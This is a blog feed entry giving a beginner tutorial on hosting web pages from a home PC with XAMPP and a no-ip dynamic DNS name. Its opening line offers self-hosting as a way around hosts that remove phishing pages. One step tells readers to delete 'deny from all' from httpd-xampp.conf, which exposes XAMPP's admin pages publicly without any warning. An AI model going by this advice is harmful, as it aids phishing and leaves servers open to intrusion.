 you ever wondered to setup a website without signing up at any web 
hosting site ? Learning web site&amp;nbsp;designing and wanna keep testing how 
your web pages look?&amp;nbsp;Free Web hosting sites removing you phishing &amp;nbsp; 
&amp;nbsp;&amp;nbsp;pages ?&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
So solution to such kinda things is in this post. &amp;nbsp;Basically we are going to turn our pc to a server.&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;What is a server &amp;nbsp;?&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSMUBc5RDPI/AAAAAAAAAB8/e7SlmTAJe78/s1600/www.jpg&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: left;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSMUBc5RDPI/AAAAAAAAAB8/e7SlmTAJe78/s1600/www.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Server is we can say, any computer 
that is serving something . Like webserver serves webpages, ftp 
server&amp;nbsp;serves files. Any computer can be turned into a server by simply 
installing a server software. In this post,&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
I am using XAMPP . &lt;b&gt;By
 installing this, contents of a particular directory of &amp;nbsp;our computer 
would accessible all over&amp;nbsp;internet . Means one could access those 
contents from any part of the world through our Public IP address.&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
You can place your web pages or whatever you wish in that directory.&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Download XAMPP from &lt;a href=&quot;http://www.apachefriends.org/en/xampp.html&quot;&gt;here&lt;/a&gt;. This package consists of Apache http server (A), MySQL database (M), php (P),Perl (P) and X represents cross platforms.&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
After dowloading it, simply install it . &lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;a href=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSMRic6_7rI/AAAAAAAAABg/68igrApVESs/s1600/a.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;237&quot; src=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSMRic6_7rI/AAAAAAAAABg/68igrApVESs/s320/a.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
At last stage on installation you will get this . Press 1 to start XAMPP control&amp;nbsp;panel.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSMRlUrpfTI/AAAAAAAAABk/wjC0ZFXk4Us/s1600/q.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;168&quot; src=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSMRlUrpfTI/AAAAAAAAABk/wjC0ZFXk4Us/s320/q.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
The control panel would look like this&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSMTFFAGSgI/AAAAAAAAAB4/_klcxaOFCRE/s1600/xpanel.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;179&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSMTFFAGSgI/AAAAAAAAAB4/_klcxaOFCRE/s320/xpanel.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Click Start to start apache server. Now lets check whether its working,&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Open your web browser and visit 
your local machine address that is 127.0.0.1 or localhost. Hopefully you
 must&amp;nbsp;get the XAMPP page as shown.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;a href=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSMRxF-oxoI/AAAAAAAAABs/QT_Dyav5_K8/s1600/y.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;260&quot; src=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSMRxF-oxoI/AAAAAAAAABs/QT_Dyav5_K8/s320/y.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Now check whether it is accessible on internet. Type your Public/External Ip&amp;nbsp;in your web browser and hit enter. &lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
If you got a page as shown, follow the instructions :&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSMRz0qY1iI/AAAAAAAAABw/imhN23jdTtA/s1600/z.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;243&quot; src=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSMRz0qY1iI/AAAAAAAAABw/imhN23jdTtA/s320/z.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
1. Go to file httpd-xampp.conf&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
2. Remove &quot;deny from all&quot; and save the file.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSMR5zxuqKI/AAAAAAAAAB0/hwpO5ewCDIg/s1600/x.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;214&quot; src=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSMR5zxuqKI/AAAAAAAAAB0/hwpO5ewCDIg/s320/x.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
3. Now restart the server and hopefully it would be all right now.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Now what ?&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
There must be a directory &#39;&lt;b&gt;htdocs&lt;/b&gt;&#39; at location C:\xampp\. The contents of this particular directory will be available&amp;nbsp;to every body. Suppose you place a file &lt;b&gt;anything.html&lt;/b&gt; in &#39;&lt;b&gt;htdocs&lt;/b&gt;&#39; directory. It would be accessible at&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;1.http://localhost/anything.html&amp;nbsp;&amp;nbsp;or http://127.0.0.1/anything.html&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
( Obviously above two links gonna work on your own computer only.)&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;2.http://xxx.xxx.xxx.xxx/anything.html&lt;/b&gt; (where xxx.xxx.xxx.xxx is your IP address)&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
You can start/stop this service simply through the control panel.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Thats all. And you have also use Filezilla(ftp server software) and Mysql (database) as per your need.&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;Get a domain name ?&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;Now you would want to get a domain name instead of &amp;nbsp;using the Public IP to check out your contents.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;But how can we get a domain name because our IP is dynamic and to which IP domain name would point ?&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;Dont worry, we have a solution.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;1. Log on to&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #990000;&quot;&gt;www.&lt;b&gt;no&lt;/b&gt;-&lt;b&gt;ip&lt;/b&gt;.com&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #0e774a; line-height: 15px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 15px;&quot;&gt;and sign up for an account. Choose available domain name.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;2. Download their dynamic DNS update client and run on PC.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;This
 client would automatically keep updating your dynamic IP address and 
that is how the selected domain would always be pointing to your IP 
address.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;i&gt;Note: You might need &amp;nbsp;do port forwarding if you are behind a router. Kindly mention the queries regarding that &amp;nbsp;in comments&lt;/i&gt;.&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/6656898536822748442/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/04/setting-webserver-host-webpages-on-your.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/6656898536822748442'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/6656898536822748442'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/04/setting-webserver-host-webpages-on-your.html' title='Setting Webserver- Host Webpages on your own computer'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSMUBc5RDPI/AAAAAAAAAB8/e7SlmTAJe78/s72-c/www.jpg" height="72" width="72"/><thr:total>0</thr:total></entry></feed>